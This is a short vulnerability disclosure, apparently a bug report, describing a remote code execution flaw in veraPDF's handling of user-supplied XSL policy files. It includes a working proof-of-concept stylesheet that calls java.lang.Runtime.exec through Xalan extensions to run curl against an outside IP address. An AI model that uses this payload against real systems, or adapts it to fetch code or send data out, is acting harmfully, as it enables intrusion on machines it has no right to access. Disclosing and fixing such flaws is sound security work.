Description
The issue occurs when clicking the execution button, where users can drag and drop policy files into the area where a policy file is not chosen. These policy files are user-controllable, and during the validation of configuration files, an XSL transformation operation is performed. The XSL file used for this operation is uploaded by the user. Due to veraPDF not setting secure parameters during XSL transformation, this could potentially lead to a remote code execution (RCE) vulnerability.

test.xsl
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,'curl http://101.200.214.173:8888 ')"/> <xsl:variable name="processString" select="ob:toString($process)"/> <xsl:value-of select="$processString"/> </xsl:template> </xsl:stylesheet>